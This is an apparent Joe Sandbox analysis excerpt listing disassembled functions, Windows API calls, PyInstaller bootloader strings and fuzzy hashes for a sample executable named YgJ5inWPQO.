                                                                                                                                                                                                      Function 00007FF7FF582C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582C9E
                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582D63
                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7FF582D99
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                      • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                      • Instruction ID: 652bea952ee70fcb8e0ddebb2e345548fb152ccc6124e73bdbcaf7afb49e76ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031F822708A8152E720BB25B8146EBAA91BF847C8F800235EF6D937D9DF3CD516C390
                                                                                                                                                                                                      Function 00007FF7FF58DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDBD
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDCB
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDF5
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DE63
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DE6F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                      • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                      • Instruction ID: 034e6306d75accbdad8fbccfff273b72e78dc3c04545962a54b6a043a30d2287
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC316E21B1A68291EF52AB12A8005B5A7D4FF58BA0FD94635ED3D073D4EF3CE458C2A0
                                                                                                                                                                                                      Function 00007FF7FF586350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                      • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                      • Instruction ID: f91ec75b9c3450c0b2a59517a70b53743fc71900d43145115887b6c67efab9cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F415261A19AC791EB11FB21E4582E9A365FB44344FD00232EA7D436D6EF3CE615C7E0
                                                                                                                                                                                                      Function 00007FF7FF582A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7FF58351A,?,00000000,00007FF7FF583F23), ref: 00007FF7FF582AA0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                                                                                                                      • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                      • Instruction ID: 496f0574b170c3ee05a47b060994296b557076bf22040d951dd61f4e7a784b42
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2821A3326197C192E720AB51B8417E6A794FB887C4F800231EEAD43699DF7CD645C790
                                                                                                                                                                                                      Function 00007FF7FF59B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                      • Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                      • Instruction ID: 784c47c2e81931832228ac7914824a95dcd60d85791ae149f28b2d624b9da380
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50217C24E0D6CA92FB7C736156511FDE2829F447A0F948734D93E47AE6DE2CA40183E0
                                                                                                                                                                                                      Function 00007FF7FF5A7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                      • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                      • Instruction ID: 314685293357904ecf1fac36fb6cc006a5f6e1658bc41e2d049bf9b4e829f8ba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C119331B18A8186E750AB56F854369A7A0FB88BE4F840334EA7D877E4DF3CD81487D0
                                                                                                                                                                                                      Function 00007FF7FF588560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7FF589216), ref: 00007FF7FF588592
                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5885E9
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF588678
                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5886E4
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5886F5
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF58870A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                      • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                      • Instruction ID: dc71c123385a93be16f486061bf5243f00c909a177be6d40365a02fc510fd84e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41A462B196C241EB30BB12A5446EAA3A4FB84BC5F840235DF7D97BC5DE3CD501C7A4
                                                                                                                                                                                                      Function 00007FF7FF59B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B347
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B37D
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3AA
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3BB
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3CC
                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3E7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                      • Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                      • Instruction ID: 8a73e7bb8976d04809ad3fe8a4c7c1b5a068a81604ddb3850d1a07ef3e2e945e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6116A24A0D6D692FB6CB32156811BDE2865F447A0FD48338E93E477EADE2CE50183A0
                                                                                                                                                                                                      Function 00007FF7FF582910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FF581B6A), ref: 00007FF7FF58295E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                      • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                      • Instruction ID: 42dd674dd24792ac39509d55fb4ee60895bc35c055690b4fa890fb0b15b52b89
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331F822B196C152EB20B761B8416E6A694BF887D4F800231EEBD83795EF7CD546C790
                                                                                                                                                                                                      Function 00007FF7FF582390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                      • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                      • Instruction ID: e80e6ccd7687d2ee56b7cac09bab08abe4f8a49e2eae157f4c834f43a8af26d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318672609AC289EB24EF61F8552F9A760FF89784F840235EA6D47B95DF3CD101C790
                                                                                                                                                                                                      Function 00007FF7FF582B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7FF58918F,?,00007FF7FF583C55), ref: 00007FF7FF582BA0
                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7FF582C2A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                      • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                      • Instruction ID: f4714e97318661e080f529a998005d688af2b1446776263923478a69a62d1afc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B021E562709B8192E710AB14F8447EAB7A4FB887C0F800232EEAD57795DF3CD215C790
                                                                                                                                                                                                      Function 00007FF7FF582710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7FF581B99), ref: 00007FF7FF582760
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                                                                                                                      • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                      • Instruction ID: 23891c94ccfbae8f1ee5ef28d63340dbc9028809e5bc62b8d3717c2ebc8fd39f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21A172A197C192EB20EB51B8817E6A7A4FB88384F800231EEAD53699DF7CD545C790
                                                                                                                                                                                                      Function 00007FF7FF599AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
